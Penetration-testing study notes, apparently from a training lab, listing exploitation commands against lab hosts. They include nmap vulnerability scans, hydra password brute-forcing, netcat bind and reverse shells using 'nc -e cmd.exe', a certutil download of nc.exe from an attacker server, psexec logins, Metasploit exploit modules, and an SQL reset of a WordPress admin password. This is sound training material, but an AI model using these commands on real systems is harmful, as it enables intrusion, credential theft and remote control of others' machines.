Exploitation

banner grabber
- using nmap nmap -sV --script=banner 192.8.94.3
- using netcat nc 192.8.94.3 22
vulnerability scanning with nmap
- find open ports nmap -sV -O 192.152.25.3
- find cgi script in apache website, use nmap to check shellshock vulnerability nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.152.25.3
fixing exploits
- using searchsploit searchsploit HTTP File Server 2.3
- download the exploit searchsploit -m 39161
- modify the exploit to the correct local port and ip
- use the script to get a reverse shell
netcat fundamentals
- netcat connect with open port nc 10.0.27.35 80
- verbose and disable dns resolution nc -nv 10.0.27.35 80
- connecting to udp ports nc -nvu 10.0.27.35 161
- transfer netcat binary to windows system cd /usr/share/windows-binaries python -m SimpleHTTPServer 80 certutil -urlcache -f http://10.10.31.2/nc.exe nc.exe
bind shells
- setup listener in windows nc.exe -nvlp 1234 -e cmd.exe
- connect it from linux nc.exe -nv 10.10.31.2 1234
reverse shells
- setup listener in linux nc -nvlp 1234
- connect it from windows nc.exe -nv 10.10.0.2 1234 -e cmd.exe
msf
- exploit processmaker use exploit/multi/http/processmaker_exec
windows port scanning and enumeration
- scan nmap -sV demo.ine.local
- check the smb nmap -sV -sC -p 445 demo.ine.local
- check the smb version use /auxiliary/scanner/smb/smb_version
targeting microsoft iis ftp
- scan nmap -sV -sC -p21,80 demo.ine.local
- check ftp access ftp demo.ine.local 21
- bruteforce smb hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local ftp
- login again ftp demo.ine.local 21
targeting openssh
- scan nmap -sV -sC -p 22 demo.ine.local
- search exploit searchsploit OpenSSH 7.1
- bruteforce hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local ssh
- login ssh vagrant@demo.ine.local
targeting smb
- scan nmap -sV -sC -p 445 demo.ine.local
- bruteforce hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local smb hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt demo.ine.local smb
- enum4linux to check other users enum4linux -u vagrant -p vagrant -U demo.ine.local
- impacket remotely login python3 psexec.py Administrator@demo.ine.local
- msf remote login use exploit/windows/smb/psexec set the exploit with set payload windows/x64/meterpreter/reverse_tcp
targeting mysql database server
- scan nmap -sV -sC -p 3306 demo.ine.local
- find the exploits searchsploit MySQL 5.5
- bruteforce msf use auxiliary/scanner/mysql/mysql_login set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
- login to sql server mysql -u root -p -h demo.ine.local
- sql commands show databases; use wordpress; show tables; select * from wp_users;
- exploit wordpress database, change password UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
linux port scanning and enumeration
- scan port nmap -sV -p1-10000 10.0.20.13
- use netcat to grab banner for unknown services
- nc -nv 10.0.20.13 1524 gives a shell
- port 80 is a webdav server
targeting vsftpd
- scan nmap -sV -sC -p 21 demo.ine.local
- check anonymous login ftp demo.ine.local 21
- searchsploit searchsploit vsftpd
- metasploit doesn’t work, ftp patched use exploit/unix/ftp/vsftpd_234_backdoor
- ftp bruteforce hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local ftp
- login again ftp demo.ine.local 21
targeting php
- scan apache nmap -sV -sC -p 80 demo.ine.local, check phpinfo.php file
- use searchsploit searchsploit php cgi
- msf module use exploit/multi/http/php_cgi_arg_injection
targeting samba
- scan nmap -sV -p 445 demo.ine.local
- check version use auxiliary/scanner/smb/smb_version
- search exploit searchsploit samba 3.0.20
- use exploit use exploit/multi/samba/usermap_script